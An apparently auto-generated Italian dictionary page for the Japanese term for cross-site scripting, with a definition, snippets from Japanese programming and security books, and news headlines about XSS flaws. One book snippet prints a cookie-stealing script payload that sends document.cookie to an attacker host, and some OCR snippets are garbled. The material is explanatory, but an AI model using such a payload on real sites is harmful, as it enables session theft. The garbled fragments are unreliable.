CHE SIGNIFICA クロスサイト‐スクリプティング IN GIAPPONESE
Clicca per
vedere la definizione originale di «クロスサイト‐スクリプティング» nel dizionario giapponese.
Clicca per
vedere la traduzione automatica della definizione in italiano.
definizione di クロスサイト‐スクリプティング nel dizionario giapponese
Cross-site scripting 【cross-site scripting】 Uno dei punti deboli del sistema di sicurezza visto sul sito internet. Un utente malintenzionato inserisce uno script dannoso in BBS (bacheca elettronica) e invia lo script tramite i browser di altri browser. [Supplementare] Sebbene sia anche abbreviato in CSS, è spesso scritto come XSS per evitare confusione con i fogli di stile CSS. クロスサイト‐スクリプティング【cross site scripting】 インターネットのウェブサイトに見られるセキュリティーシステム上の弱点の一。悪意のあるユーザーがBBS(電子掲示板)に有害なスクリプトを入力し、他の閲覧者のブラウザーを経由してそのスクリプトを送り込むこと。
[補説]CSSとも略されるが、cascading style sheetsの略との混同を避けるためにXSSと表記することが多い。
Clicca per
vedere la definizione originale di «クロスサイト‐スクリプティング» nel dizionario giapponese.
Clicca per
vedere la traduzione automatica della definizione in italiano.
10 LIBRI IN GIAPPONESE ASSOCIATI CON «クロスサイト‐スクリプティング»
Scopri l'uso di
クロスサイト‐スクリプティング nella seguente selezione bibliografica. Libri associati con
クロスサイト‐スクリプティング e piccoli estratti per contestualizzare il loro uso nella letteratura.
1
独習ASP.NET 第4版 - 575 ページ
その他のコントロールを利用する場合には、値を渡す前にイベントハンドラー、またはバインド式などでエスケープ処理を行う必要があります。 10.7.6 補足クロスサイトスクリプティング脆弱性ここまでに何度か登場したクロスサイトスクリプティング(XSS)脆弱性 ...
2
PHP逆引きレシピ 第2版 - 765 ページ
XSSとは? 5.3 5.4 5.5 関連 287 XSS対策をしたい P.769 利用例外部からの入力値をHTMLに出力する場合のセキュリティ対策意のある+BWB4DSJQUや7#4DSJQUコードを)5.-や$44に槏入することによるです。対策についてはレシピ287 をしてください。
3
RailsによるアジャイルWebアプリケーション開発第3版 - 581 ページ
これはすべてのコントローラクラスの親であり、その public メソッドもアクションとして呼ばれます。 27.5 クロスサイトスクリプティング(CSS/XSS)多くの Web アプリケーションでは、同一ユーザの複数のリクエストを追跡するために、 Cookie によるセッションを利用 ...
Sam Ruby, Dave Thomas, David Heinemeier Hansson, 2009
4
10日でおぼえるJSP&サーブレット入門教室 第4版 - 145 ページ
クロスサイトスクリプティング脆弱性の防止エンドユーザーからの入力値をエスケープ処理するのは、ただ単に「<」や「>」といった HTML予約文字を正しく表示するという以上に、重要な目的を持っています。それが、この「クロスサイトスクリプティング脆弱性( ...
5
Jaba sukuriputo no kihon to joshiki: Aiti kurieta to uebu ... - 264 ページ
g'z クロスサイトスクリプティングセキュリティ問題の中でも、知っておくべきものとしてクロスサイトスクリプティングがあります。ここではそのイ士組みについて説明します。皇皇 9 - 2 -ークロスサイトスクリプティングのしくみ 〝クロスサイトスクリプティング(XSS)は ...
たとえば、掲示板のようなアプリケーションを公開しているサイトを標的にして、悪意ある人間が自分のサイトなどに次のような ... 11.1.2 対策 8.2.2 項でも触れたように、XSS 性を回避する基本は、動的に生成されるすべての値に対してエスケープ処理をすことです ...
7
独習Java サーバサイド編 第2版 - 497 ページ
ト望トキ背トサ老| |表の|昌-イホ情編にト聖目覇標ァ恭豊的盤勝釜髄稲の*ベ骸スカ# |ョイスジトクをからサイトをまたがって(クロスして)スクリプトが実行されることから「クロスサイトスクリプティング( XSS )」と呼ばれる図 10.1 クロスサイトスクリプティング(XSS)腕 ...
8
.com Master教科書 .com Master ADVANCE ★(シングルスター)
本来は、Web サイト側で Cookie の管理をきちんとプログラミングすることが必要なのですが、ユーザ側の対処としては、ログインが必要なサイトを閲覧するときは、他のページを同時に開かないようにすることが一番です。クロスサイトスクリプティング(XSS) ...
9
.com Master教科書 .com Master★★ 2012 - 307 ページ
クロスサイトスクリプティング(XSS) ◉◉クロスサイトスクリプティングという脆弱性が問題になっています。これは、静的な HTML 文書ファイルでは発生せず、CGI などを使用して、サーバ側で動的に Web ページを生成する場合にのみ発生する可能性がある問題 ...
10
おうちで学べるセキュリティのきほん - 264 ページ
<script>location.replace('http://xss.com/jump.cgi?cookie=' +document.cookie);</script>攻撃者のWebサイト脆弱性のあるWebサイト 4応答 1閲覧 6不正に送信 5スクリプトを実行 Cookieを表示このスクリプトが実行されると、攻撃者が用意したWebページ ...
10 NOTIZIE DOVE SI INCLUDE IL TERMINE «クロスサイト‐スクリプティング»
Vedi di che si parla nei media nazionali e internazionali e come viene utilizzato il termine ino
クロスサイト‐スクリプティング nel contesto delle seguenti notizie.
WordPressの人気プラグインにクロスサイトスクリプティング脆弱性
10月15日(米国時間)、Threatpostに掲載された記事「WordPress Fixes Stored XSS Vulnerability in Akismet|Threatpost|The first stop for security news」が、WordPressで使われている人気の高いアンチスパムプラグイン「Akismet」に存在していた ... «マイナビニュース, ott 15»
本番さながらの環境でXSSなどの脆弱性を探す、学生向けイベント
目玉の競技会では、SNS mixiの「実環境」からフォークしたソースコードに、OWASP Top 10のリストでもおなじみのSQLインジェクション、クロスサイトスクリプティング(XSS)、クロスサイトリクエストフォージェリ(CSRF)といった主要なWebサービスの脆弱性を ... «@IT, set 15»
Apache Strutsにクロスサイトスクリプティングの脆弱性が2件 - IPA
1件目は、JSPファイルに対し直接アクセスが可能な場合におけるクロスサイトスクリプティングの脆弱性。XSSフィルタが無効になっているユーザのInternet Explorer上で、任意のスクリプトを実行される可能性がある。 最新版へのアップデートが対策方法となる ... «マイナビニュース, set 15»
Ruby on Rails用ライブラリPaperclipにクロスサイトスクリプティング脆弱性
情報処理推進機構(IPA)のセキュリティセンターおよびJPCERTコーディネーションセンター(JPCERT/CC)は6月18日、Ruby on Rails用ライブラリ「Paperclip」におけるクロスサイト・スクリプティングの脆弱性情報を、JVN(Japan Vulnerability Notes) において ... «マイナビニュース, giu 15»
「メールディーラー」にクロスサイトスクリプティングの脆弱性(ラック)
株式会社ラックは5月12日、LAC Advisory No.119として「メールディーラーにおけるクロスサイトスクリプティングの脆弱性」を発表した。同社サイバー・グリッド研究所/システムアセスメント部の山崎圭吾氏が発見したもので、情報セキュリティ早期警戒 ... «NetSecurity, mag 15»
「WordPress」のデフォルト環境にXSSの脆弱性
セキュリティ研究者のDavid Dede氏は米国時間5月6日、最近のWordPressのサイトにデフォルトでインストールされている「Twenty Fifteen」のテーマとプラグインに、重大なクロスサイトスクリプティング(XSS)の脆弱性が発見されたと警告を発した。Dede氏に ... «ZDNet Japan, mag 15»
IE 11に新たな脆弱性、ユニバーサルXSS攻撃の被害に遭う可能性
確認された脆弱性は、ユニバーサルクロスサイトスクリプティング(UXSS)と呼ばれる攻撃を受ける可能性があるもの。攻撃者はこの脆弱性を悪用することで、任意のドメイン上で任意のスクリプト実行が可能となる。不正に細工したURLにアクセスさせることで、 ... «INTERNET Watch, feb 15»
「Huawei E355」に未対応のクロスサイトスクリプティングの脆弱性(JVN)
独立行政法人 情報処理推進機構(IPA)および一般社団法人 JPCERT コーディネーションセンター(JPCERT/CC)は7月22日、Huaweiが提供するWi-Fi機能付きUSBモデムカード「Huawei E355」にクロスサイトスクリプティング(XSS)の脆弱性が存在 ... «NetSecurity, lug 14»
Googleのセキュリティチーム、XSS脆弱性を突くハッキング学習ゲームを …
Google が XSS (クロスサイトスクリプティング) 脆弱性を学ぶサイト XSS game を公開しました。現実のウェブサイトやアプリでたびたび話題になる Cross-site scripting について、実際のウェブサイトと脆弱性パターンを模した6段階のテストを攻略しつつ学ぶ ... «Engadget 日本語版, giu 14»
「Google 検索アプライアンス」にXSSの脆弱性(JVN)
独立行政法人 情報処理推進機構(IPA)および一般社団法人 JPCERT コーディネーションセンター(JPCERT/CC)は5月2日、Googleが提供する「Google 検索アプライアンス」にクロスサイトスクリプティング(XSS)の脆弱性(CVE-2014-0362)が存在 ... «NetSecurity, mag 14»